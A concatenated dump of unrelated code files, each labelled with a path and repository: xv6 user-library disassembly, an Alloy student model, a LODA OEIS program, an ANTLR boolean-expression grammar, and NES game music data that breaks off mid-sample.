00000270 <gets>: char* gets(char *buf, int max) { 270: f3 0f 1e fb endbr32 274: 55 push %ebp 275: 89 e5 mov %esp,%ebp 277: 57 push %edi 278: 56 push %esi int i, cc; char c; for(i=0; i+1 < max; ){ 279: 31 f6 xor %esi,%esi { 27b: 53 push %ebx 27c: 89 f3 mov %esi,%ebx 27e: 83 ec 1c sub $0x1c,%esp 281: 8b 7d 08 mov 0x8(%ebp),%edi for(i=0; i+1 < max; ){ 284: eb 33 jmp 2b9 <gets+0x49> 286: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 28d: 8d 76 00 lea 0x0(%esi),%esi cc = read(0, &c, 1); 290: 83 ec 04 sub $0x4,%esp 293: 8d 45 e7 lea -0x19(%ebp),%eax 296: 6a 01 push $0x1 298: 50 push %eax 299: 6a 00 push $0x0 29b: e8 d1 01 00 00 call 471 <read> if(cc < 1) 2a0: 83 c4 10 add $0x10,%esp 2a3: 85 c0 test %eax,%eax 2a5: 7e 1c jle 2c3 <gets+0x53> break; buf[i++] = c; 2a7: 0f b6 45 e7 movzbl -0x19(%ebp),%eax 2ab: 83 c7 01 add $0x1,%edi 2ae: 88 47 ff mov %al,-0x1(%edi) if(c == '\n' || c == '\r') 2b1: 3c 0a cmp $0xa,%al 2b3: 74 23 je 2d8 <gets+0x68> 2b5: 3c 0d cmp $0xd,%al 2b7: 74 1f je 2d8 <gets+0x68> for(i=0; i+1 < max; ){ 2b9: 83 c3 01 add $0x1,%ebx 2bc: 89 fe mov %edi,%esi 2be: 3b 5d 0c cmp 0xc(%ebp),%ebx 2c1: 7c cd jl 290 <gets+0x20> 2c3: 89 f3 mov %esi,%ebx break; } buf[i] = '\0'; return buf; } 2c5: 8b 45 08 mov 0x8(%ebp),%eax buf[i] = '\0'; 2c8: c6 03 00 movb $0x0,(%ebx) } 2cb: 8d 65 f4 lea -0xc(%ebp),%esp 2ce: 5b pop %ebx 2cf: 5e pop %esi 2d0: 5f pop %edi 2d1: 5d pop %ebp 2d2: c3 ret 2d3: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 2d7: 90 nop 2d8: 8b 75 08 mov 0x8(%ebp),%esi 2db: 8b 45 08 mov 0x8(%ebp),%eax 2de: 01 de add %ebx,%esi 2e0: 89 f3 mov %esi,%ebx buf[i] = '\0'; 2e2: c6 03 00 movb $0x0,(%ebx) } 2e5: 8d 65 f4 lea -0xc(%ebp),%esp 2e8: 5b pop %ebx 2e9: 5e pop %esi 2ea: 5f pop %edi 2eb: 5d pop %ebp 2ec: c3 ret 2ed: 8d 76 00 lea 0x0(%esi),%esi 000002f0 <stat>: int stat(const char *n, struct stat *st) { 2f0: f3 0f 1e fb endbr32 2f4: 55 push %ebp 2f5: 89 e5 mov %esp,%ebp 2f7: 56 push %esi 2f8: 53 push %ebx int fd; int r; fd = open(n, O_RDONLY); 2f9: 83 ec 08 sub $0x8,%esp 2fc: 6a 00 push $0x0 2fe: ff 75 08 pushl 0x8(%ebp) 301: e8 93 01 00 00 call 499 <open> if(fd < 0) 306: 83 c4 10 add $0x10,%esp 309: 85 c0 test %eax,%eax 30b: 78 2b js 338 <stat+0x48> return -1; r = fstat(fd, st); 30d: 83 ec 08 sub $0x8,%esp 310: ff 75 0c pushl 0xc(%ebp) 313: 89 c3 mov %eax,%ebx 315: 50 push %eax 316: e8 96 01 00 00 call 4b1 <fstat> close(fd); 31b: 89 1c 24 mov %ebx,(%esp) r = fstat(fd, st); 31e: 89 c6 mov %eax,%esi close(fd); 320: e8 5c 01 00 00 call 481 <close> return r; 325: 83 c4 10 add $0x10,%esp } 328: 8d 65 f8 lea -0x8(%ebp),%esp 32b: 89 f0 mov %esi,%eax 32d: 5b pop %ebx 32e: 5e pop %esi 32f: 5d pop %ebp 330: c3 ret 331: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi return -1; 338: be ff ff ff ff mov $0xffffffff,%esi 33d: eb e9 jmp 328 <stat+0x38> 33f: 90 nop 00000340 <atoi>: int atoi(const char *s) { 340: f3 0f 1e fb endbr32 344: 55 push %ebp 345: 89 e5 mov %esp,%ebp 347: 53 push %ebx 348: 8b 55 08 mov 0x8(%ebp),%edx int n; n = 0; while('0' <= *s && *s <= '9') 34b: 0f be 02 movsbl (%edx),%eax 34e: 8d 48 d0 lea -0x30(%eax),%ecx 351: 80 f9 09 cmp $0x9,%cl n = 0; 354: b9 00 00 00 00 mov $0x0,%ecx while('0' <= *s && *s <= '9') 359: 77 1a ja 375 <atoi+0x35> 35b: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 35f: 90 nop n = n*10 + *s++ - '0'; 360: 83 c2 01 add $0x1,%edx 363: 8d 0c 89 lea (%ecx,%ecx,4),%ecx 366: 8d 4c 48 d0 lea -0x30(%eax,%ecx,2),%ecx while('0' <= *s && *s <= '9') 36a: 0f be 02 movsbl (%edx),%eax 36d: 8d 58 d0 lea -0x30(%eax),%ebx 370: 80 fb 09 cmp $0x9,%bl 373: 76 eb jbe 360 <atoi+0x20> return n; } 375: 89 c8 mov %ecx,%eax 377: 5b pop %ebx 378: 5d pop %ebp 379: c3 ret 37a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 00000380 <memmove>: void* memmove(void *vdst, const void *vsrc, int n) { 380: f3 0f 1e fb endbr32 384: 55 push %ebp 385: 89 e5 mov %esp,%ebp 387: 57 push %edi 388: 8b 45 10 mov 0x10(%ebp),%eax 38b: 8b 55 08 mov 0x8(%ebp),%edx 38e: 56 push %esi 38f: 8b 75 0c mov 0xc(%ebp),%esi char *dst; const char *src; dst = vdst; src = vsrc; while(n-- > 0) 392: 85 c0 test %eax,%eax 394: 7e 0f jle 3a5 <memmove+0x25> 396: 01 d0 add %edx,%eax dst = vdst; 398: 89 d7 mov %edx,%edi 39a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi *dst++ = *src++; 3a0: a4 movsb %ds:(%esi),%es:(%edi) while(n-- > 0) 3a1: 39 f8 cmp %edi,%eax 3a3: 75 fb jne 3a0 <memmove+0x20> return vdst; } 3a5: 5e pop %esi 3a6: 89 d0 mov %edx,%eax 3a8: 5f pop %edi 3a9: 5d pop %ebp 3aa: c3 ret 3ab: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 3af: 90 nop 000003b0 <thread_create>: //thread library int thread_create(void(*start_routine)(void*,void*),void* arg1 ,void* arg2) { 3b0: f3 0f 1e fb endbr32 3b4: 55 push %ebp 3b5: 89 e5 mov %esp,%ebp 3b7: 83 ec 14 sub $0x14,%esp void* stack; stack =sbrk(4096); //pgsize 3ba: 68 00 10 00 00 push $0x1000 3bf: e8 1d 01 00 00 call 4e1 <sbrk> return clone(start_routine,arg1,arg2,stack); 3c4: 50 push %eax 3c5: ff 75 10 pushl 0x10(%ebp) 3c8: ff 75 0c pushl 0xc(%ebp) 3cb: ff 75 08 pushl 0x8(%ebp) 3ce: e8 26 01 00 00 call 4f9 <clone> } 3d3: c9 leave 3d4: c3 ret 3d5: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 3dc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 000003e0 <thread_join>: int thread_join() { 3e0: f3 0f 1e fb endbr32 3e4: 55 push %ebp 3e5: 89 e5 mov %esp,%ebp 3e7: 83 ec 24 sub $0x24,%esp void * stackPtr; int x = join(&stackPtr); 3ea: 8d 45 f4 lea -0xc(%ebp),%eax 3ed: 50 push %eax 3ee: e8 0e 01 00 00 call 501 <join> return x; } 3f3: c9 leave 3f4: c3 ret 3f5: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 3fc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 00000400 <lock_init>: void lock_init(struct lock_t *lk){ 400: f3 0f 1e fb endbr32 404: 55 push %ebp 405: 89 e5 mov %esp,%ebp lk->locked=0; //intialize as unnlocked 407: 8b 45 08 mov 0x8(%ebp),%eax 40a: c7 00 00 00 00 00 movl $0x0,(%eax) } 410: 5d pop %ebp 411: c3 ret 412: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 419: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 00000420 <lock_acquire>: void lock_acquire(struct lock_t *lk){ 420: f3 0f 1e fb endbr32 424: 55 push %ebp xchg(volatile uint *addr, uint newval) { uint result; // The + in "+m" denotes a read-modify-write operand. asm volatile("lock; xchgl %0, %1" : 425: b9 01 00 00 00 mov $0x1,%ecx 42a: 89 e5 mov %esp,%ebp 42c: 8b 55 08 mov 0x8(%ebp),%edx 42f: 90 nop 430: 89 c8 mov %ecx,%eax 432: f0 87 02 lock xchg %eax,(%edx) while(xchg(&lk->locked,1) != 0); 435: 85 c0 test %eax,%eax 437: 75 f7 jne 430 <lock_acquire+0x10> } 439: 5d pop %ebp 43a: c3 ret 43b: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 43f: 90 nop 00000440 <lock_release>: void lock_release(struct lock_t *lk){ 440: f3 0f 1e fb endbr32 444: 55 push %ebp 445: 31 c0 xor %eax,%eax 447: 89 e5 mov %esp,%ebp 449: 8b 55 08 mov 0x8(%ebp),%edx 44c: f0 87 02 lock xchg %eax,(%edx) xchg(&lk->locked,0) ; } 44f: 5d pop %ebp 450: c3 ret 00000451 <fork>: name: \ movl $SYS_ ## name, %eax; \ int $T_SYSCALL; \ ret SYSCALL(fork) 451: b8 01 00 00 00 mov $0x1,%eax 456: cd 40 int $0x40 458: c3 ret 00000459 <exit>: SYSCALL(exit) 459: b8 02 00 00 00 mov $0x2,%eax 45e: cd 40 int $0x40 460: c3 ret 00000461 <wait>: SYSCALL(wait) 461: b8 03 00 00 00 mov $0x3,%eax 466: cd 40 int $0x40 468: c3 ret 00000469 <pipe>: SYSCALL(pipe) 469: b8 04 00 00 00 mov $0x4,%eax 46e: cd 40 int $0x40 470: c3 ret 00000471 <read>: SYSCALL(read) 471: b8 05 00 00 00 mov $0x5,%eax 476: cd 40 int $0x40 478: c3 ret 00000479 <write>: SYSCALL(write) 479: b8 10 00 00 00 mov $0x10,%eax 47e: cd 40 int $0x40 480: c3 ret 00000481 <close>: SYSCALL(close) 481: b8 15 00 00 00 mov $0x15,%eax 486: cd 40 int $0x40 488: c3 ret 00000489 <kill>: SYSCALL(kill) 489: b8 06 00 00 00 mov $0x6,%eax 48e: cd 40 int $0x40 490: c3 ret 00000491 <exec>: SYSCALL(exec) 491: b8 07 00 00 00 mov $0x7,%eax 496: cd 40 int $0x40 498: c3 ret 00000499 <open>: SYSCALL(open) 499: b8 0f 00 00 00 mov $0xf,%eax 49e: cd 40 int $0x40 4a0: c3 ret 000004a1 <mknod>: SYSCALL(mknod) 4a1: b8 11 00 00 00 mov $0x11,%eax 4a6: cd 40 int $0x40 4a8: c3 ret 000004a9 <unlink>: SYSCALL(unlink) 4a9: b8 12 00 00 00 mov $0x12,%eax 4ae: cd 40 int $0x40 4b0: c3 ret 000004b1 <fstat>: SYSCALL(fstat) 4b1: b8 08 00 00 00 mov $0x8,%eax 4b6: cd 40 int $0x40 4b8: c3 ret 000004b9 <link>: SYSCALL(link) 4b9: b8 13 00 00 00 mov $0x13,%eax 4be: cd 40 int $0x40 4c0: c3 ret 000004c1 <mkdir>: SYSCALL(mkdir) 4c1: b8 14 00 00 00 mov $0x14,%eax 4c6: cd 40 int $0x40 4c8: c3 ret 000004c9 <chdir>: SYSCALL(chdir) 4c9: b8 09 00 00 00 mov $0x9,%eax 4ce: cd 40 int $0x40 4d0: c3 ret 000004d1 <dup>: SYSCALL(dup) 4d1: b8 0a 00 00 00 mov $0xa,%eax 4d6: cd 40 int $0x40 4d8: c3 ret 000004d9 <getpid>: SYSCALL(getpid) 4d9: b8 0b 00 00 00 mov $0xb,%eax 4de: cd 40 int $0x40 4e0: c3 ret 000004e1 <sbrk>: SYSCALL(sbrk) 4e1: b8 0c 00 00 00 mov $0xc,%eax 4e6: cd 40 int $0x40 4e8: c3 ret 000004e9 <sleep>: SYSCALL(sleep) 4e9: b8 0d 00 00 00 mov $0xd,%eax 4ee: cd 40 int $0x40 4f0: c3 ret 000004f1 <uptime>: SYSCALL(uptime) 4f1: b8 0e 00 00 00 mov $0xe,%eax 4f6: cd 40 int $0x40 4f8: c3 ret 000004f9 <clone>: SYSCALL(clone) 4f9: b8 16 00 00 00 mov $0x16,%eax 4fe: cd 40 int $0x40 500: c3 ret 00000501 <join>: 501: b8 17 00 00 00 mov $0x17,%eax 506: cd 40 int $0x40 508: c3 ret

alloy4fun_models/trashltl/models/14/63MbKHt59DhniMdKb.als

Kaixi26/org.alloytools.alloy

0

4320

open main pred id63MbKHt59DhniMdKb_prop15 { all f:File | eventually (f not in Trash implies f in Trash) } pred __repair { id63MbKHt59DhniMdKb_prop15 } check __repair { id63MbKHt59DhniMdKb_prop15 <=> prop15o }

oeis/024/A024553.asm

neoneye/loda-programs

11

105195

; A024553: [ 1/{n*sqrt(5)} ], where {x} := x - [ x ]. ; Submitted by <NAME> ; 4,2,1,1,5,2,1,1,8,2,1,1,14,3,1,1,76,4,2,1,1,5,2,1,1,7,2,1,1,12,3,1,1,38,3,2,1,1,4,2,1,1,6,2,1,1,10,3,1,1,25,3,1,1,1,4,2,1,1,6,2,1,1,9,2,1,1,19,3,1,1,1,4,2,1,1,5,2,1,1,8,2,1,1,15,3,1,1,99,4,2,1,1,5,2,1,1,7,2,1 add $0,1 mov $1,$0 mul $0,2 pow $1,2 lpb $1 sub $1,$0 add $0,1 sub $1,$0 lpe mul $0,2 div $0,$1

src/main/antlr/lsck/combiner/expand/BooleanExpression.g4

Brinsky/LFSR-Stream-Cipher-Kit

2

7650

grammar BooleanExpression; @header{ package lsck.combiner.expand; } expr : expr expr # Product | expr '+' expr # Sum | VARIABLE+ # SimpleTerm | CONSTANT # Constant | '(' expr ')' # Parens ; VARIABLE : 'x' [0-9]+; CONSTANT : '0' | '1'; WHITESPACE : (' ' | '\t' | '\r' | '\n') -> skip ;

game/data/music/theme_adventure.asm

sgadrat/super-tilt-bro

91

26129

<reponame>sgadrat/super-tilt-bro music_adventure_bank = CURRENT_BANK_NUMBER music_adventure_info: .word music_adventure_track_pulse1 .word music_adventure_track_pulse2 .word music_adventure_track_triangle .word music_adventure_track_noise .byt 0 music_adventure_track_pulse1: .word music_adventure_sample_120 .word music_adventure_sample_119 .word music_adventure_sample_121 .word music_adventure_sample_119 .word music_adventure_sample_122 .word music_adventure_sample_120 .word music_adventure_sample_119 .word music_adventure_sample_121 .word music_adventure_sample_119 .word music_adventure_sample_123 .word music_adventure_sample_0 .word music_adventure_sample_1 .word music_adventure_sample_2 .word music_adventure_sample_3 .word music_adventure_sample_16 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_18 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_19 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_20 .word music_adventure_sample_21 .word music_adventure_sample_15 .word music_adventure_sample_22 .word music_adventure_sample_15 .word music_adventure_sample_23 .word music_adventure_sample_21 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_24 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_25 .word music_adventure_sample_15 .word music_adventure_sample_26 .word music_adventure_sample_27 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_28 .word music_adventure_sample_15 .word music_adventure_sample_29 .word music_adventure_sample_114 .word music_adventure_sample_115 .word music_adventure_sample_114 .word music_adventure_sample_116 .word music_adventure_sample_114 .word music_adventure_sample_117 .word music_adventure_sample_114 .word music_adventure_sample_118 .word music_adventure_sample_99 .word music_adventure_sample_100 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_30 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_31 .word music_adventure_sample_99 .word music_adventure_sample_101 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_32 .word music_adventure_sample_15 .word music_adventure_sample_33 .word music_adventure_sample_99 .word music_adventure_sample_102 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_34 .word music_adventure_sample_15 .word music_adventure_sample_35 .word music_adventure_sample_99 .word music_adventure_sample_103 .word music_adventure_sample_15 .word music_adventure_sample_36 .word music_adventure_sample_15 .word music_adventure_sample_37 .word music_adventure_sample_4 .word music_adventure_sample_5 .word music_adventure_sample_4 .word music_adventure_sample_6 .word music_adventure_sample_67 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_68 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_69 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_68 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_67 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_68 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_11 .word music_adventure_sample_62 .word music_adventure_sample_61 .word music_adventure_sample_63 .word music_adventure_sample_61 .word music_adventure_sample_64 .word music_adventure_sample_61 .word music_adventure_sample_65 .word music_adventure_sample_61 .word music_adventure_sample_66 MUSIC_END music_adventure_track_pulse2: .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_125 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_125 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_125 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_82 .word music_adventure_sample_84 .word music_adventure_sample_82 .word music_adventure_sample_85 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_88 .word music_adventure_sample_82 .word music_adventure_sample_89 .word music_adventure_sample_82 .word music_adventure_sample_90 .word music_adventure_sample_82 .word music_adventure_sample_91 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_88 .word music_adventure_sample_82 .word music_adventure_sample_83 .word music_adventure_sample_82 .word music_adventure_sample_84 .word music_adventure_sample_82 .word music_adventure_sample_85 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_88 .word music_adventure_sample_82 .word music_adventure_sample_89 .word music_adventure_sample_82 .word music_adventure_sample_90 .word music_adventure_sample_82 .word music_adventure_sample_91 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_92 .word music_adventure_sample_62 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_70 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_71 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_129 .word music_adventure_sample_63 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_62 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_70 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_72 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_73 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_128 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_126 MUSIC_END music_adventure_track_triangle: .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_74 .word music_adventure_sample_76 .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_104 .word music_adventure_sample_105 .word music_adventure_sample_39 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_42 .word music_adventure_sample_38 .word music_adventure_sample_43 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_38 .word music_adventure_sample_45 .word music_adventure_sample_38 .word music_adventure_sample_46 .word music_adventure_sample_39 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_42 .word music_adventure_sample_38 .word music_adventure_sample_43 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_38 .word music_adventure_sample_45 .word music_adventure_sample_38 .word music_adventure_sample_46 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_48 .word music_adventure_sample_38 .word music_adventure_sample_49 .word music_adventure_sample_38 .word music_adventure_sample_50 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_51 .word music_adventure_sample_38 .word music_adventure_sample_52 .word music_adventure_sample_38 .word music_adventure_sample_53 .word music_adventure_sample_38 .word music_adventure_sample_49 .word music_adventure_sample_48 .word music_adventure_sample_38 .word music_adventure_sample_49 .word music_adventure_sample_38 .word music_adventure_sample_50 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_51 .word music_adventure_sample_38 .word music_adventure_sample_54 .word music_adventure_sample_38 .word music_adventure_sample_55 .word music_adventure_sample_38 .word music_adventure_sample_56 .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_74 .word music_adventure_sample_76 .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_104 .word music_adventure_sample_106 MUSIC_END music_adventure_track_noise: .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_98 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_80 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_81 .word music_adventure_sample_57 .word music_adventure_sample_58 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_80 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_81 .word music_adventure_sample_57 .word music_adventure_sample_58 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_60 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_60 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_112 .word music_adventure_sample_111 .word music_adventure_sample_107 .word music_adventure_sample_108 .word music_adventure_sample_113 .word music_adventure_sample_111 .word music_adventure_sample_107 .word music_adventure_sample_109 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_98 .word music_adventure_sample_57 .word music_adventure_sample_59 MUSIC_END music_adventure_sample_0: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) 